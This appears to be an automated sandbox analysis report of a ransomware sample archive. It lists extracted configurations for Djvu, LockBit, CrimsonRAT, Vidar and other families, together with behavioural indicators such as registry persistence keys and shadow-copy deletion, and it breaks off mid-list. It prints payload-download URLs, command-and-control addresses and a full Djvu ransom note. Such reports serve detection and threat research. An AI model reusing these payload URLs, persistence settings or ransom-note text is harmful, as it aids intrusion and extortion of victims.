Analysis
-
max time kernel
138s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-10-2024 21:25
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00435.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00435.7z
-
Size
7.2MB
-
MD5
ebfbfabb47ffd00e16ebd8724c63adc5
-
SHA1
bb9c0edec43860dc1e5610716b5bc7164bde37ba
-
SHA256
fabdb10b28b5e0bd4c9b38be6292bc5966cb2dd2428486bad8f056fb4696be27
-
SHA512
1b367064fd2f9fdf8bcaa787b1cdf4ff758fb7be875e466875b956a6d8607692843c7c12316a70671eb58480726513bad2217e0cbd292987143d22777855b101
-
SSDEEP
196608:2zYGZc71m9mVl5WldX9NUc/g6thkfMLZfqoh4Za:6ZSm9mVl5WldTx2fMFBaZa
Malware Config
Extracted
crimsonrat
64.188.25.232
Extracted
djvu
http://asvb.top/nddddhsspen6/get.php
-
extension
.pcqq
-
offline_id
3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1
-
payload_url
http://asvb.top/files/penelop/updatewin1.exe
http://asvb.top/files/penelop/updatewin2.exe
http://asvb.top/files/penelop/updatewin.exe
http://asvb.top/files/penelop/3.exe
http://asvb.top/files/penelop/4.exe
http://asvb.top/files/penelop/5.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-TVrnNufMGq Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0296Sirj
Extracted
C:\Program Files\dotnet\Restore-My-Files.txt
lockbit
http://lockbit-decryptor.top/?9AE2456EE17245AACA2CBD635B5B9B18
http://lockbitks2tvnmwk.onion/?9AE2456EE17245AACA2CBD635B5B9B18
Extracted
vidar
38.7
904
https://HAL9THapi.faceit.comramilgame
-
profile_id
904
Extracted
urelas
112.175.88.207
112.175.88.208
Signatures
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x000a000000023b88-100.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Detected Djvu ransomware 9 IoCs
resource yara_rule behavioral1/memory/4480-162-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4480-160-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4480-3789-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4480-3833-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5844-3839-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5844-3837-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5844-3842-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5844-3843-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/5844-3857-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Djvu family
-
GandCrab payload 2 IoCs
resource yara_rule behavioral1/memory/3772-115-0x0000000000700000-0x0000000000717000-memory.dmp family_gandcrab behavioral1/memory/3772-114-0x0000000000400000-0x0000000000460000-memory.dmp family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\IExplorer.exe\"" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\IExplorer.exe" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Urelas family
-
VanillaRat
VanillaRat is an advanced remote administration tool coded in C#.
-
Vanillarat family
-
Vidar family
-
Xmrig family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detected Nirsoft tools 1 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/540-113-0x0000000005250000-0x00000000052E6000-memory.dmp Nirsoft -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6796 bcdedit.exe 6824 bcdedit.exe -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/540-113-0x0000000005250000-0x00000000052E6000-memory.dmp WebBrowserPassView -
Renames multiple (3303) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Vanilla Rat payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000023b85-84.dat vanillarat behavioral1/memory/4696-95-0x00000000008D0000-0x00000000008F2000-memory.dmp vanillarat -
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/4312-2697-0x0000000000400000-0x00000000004A8000-memory.dmp family_vidar -
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2864-3866-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/2864-3868-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/2864-3870-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/2864-3872-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/2864-3871-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/2864-3874-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/2864-3873-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/2864-4191-0x0000000140000000-0x000000014072E000-memory.dmp xmrig -
pid Process 6856 wbadmin.exe -
Disables RegEdit via registry modification 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Startup .exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Startup .exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\STARTUP .exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\STARTUP .exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Executes dropped EXE 47 IoCs
pid Process 4384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe 4696 HEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exe 540 HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe 4776 HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe 3156 HEUR-Trojan-Ransom.MSIL.Foreign.gen-a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc.exe 4312 HEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exe 3772 HEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exe 1052 HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 1840 Trojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exe 3548 Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe 2272 Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe 244 test.exe 4480 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 5916 xk.exe 5468 IExplorer.exe 6276 WINLOGON.EXE 5248 CSRSS.EXE 6668 SERVICES.EXE 5404 LSASS.EXE 3160 Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe 6012 Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe 6236 Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe 6200 SMSS.EXE 5680 MediaFoundation.exe 2272 Services.exe 6412 huter.exe 1660 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 5844 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 5908 shell.exe 2832 shell.exe 4464 shell.exe 652 shell.exe 4740 shell.exe 6724 shell.exe 2600 shell.exe 2852 shell.exe 6524 shell.exe 5580 shell.exe 5220 xk.exe 1332 IExplorer.exe 6368 WINLOGON.EXE 5400 CSRSS.EXE 5252 SERVICES.EXE 6396 LSASS.EXE 6064 SMSS.EXE -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 6048 icacls.exe -
Modifies system executable filetype association 2 TTPs 13 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000a000000023b86-88.dat vmprotect behavioral1/memory/540-93-0x0000000000790000-0x0000000000A50000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\Desktop\\00435\\HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe\"" HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ecc3850c-a3f1-4e9f-bf3e-e16dac3f83c4\\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe\" --AutoStart" HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Services.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysnet = "C:\\Users\\Admin\\AppData\\Local\\sysnetwin.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xk = "C:\\Windows\\xk.exe" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
pid Process 1564 powershell.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\desktop.ini Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created C:\desktop.ini Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened for modification F:\desktop.ini Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created F:\desktop.ini Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\B: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\G: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\H: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\K: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\M: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\O: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\F: HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened (read-only) \??\U: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 53 api.2ip.ua 60 api.2ip.ua 581 api.2ip.ua -
pid Process 6424 arp.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\IExplorer.exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened for modification C:\Windows\SysWOW64\Mig2.scr Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File opened for modification C:\Windows\SysWOW64\shell.exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created C:\Windows\SysWOW64\shell.exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created C:\Windows\SysWOW64\Mig2.scr Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created C:\Windows\SysWOW64\IExplorer.exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 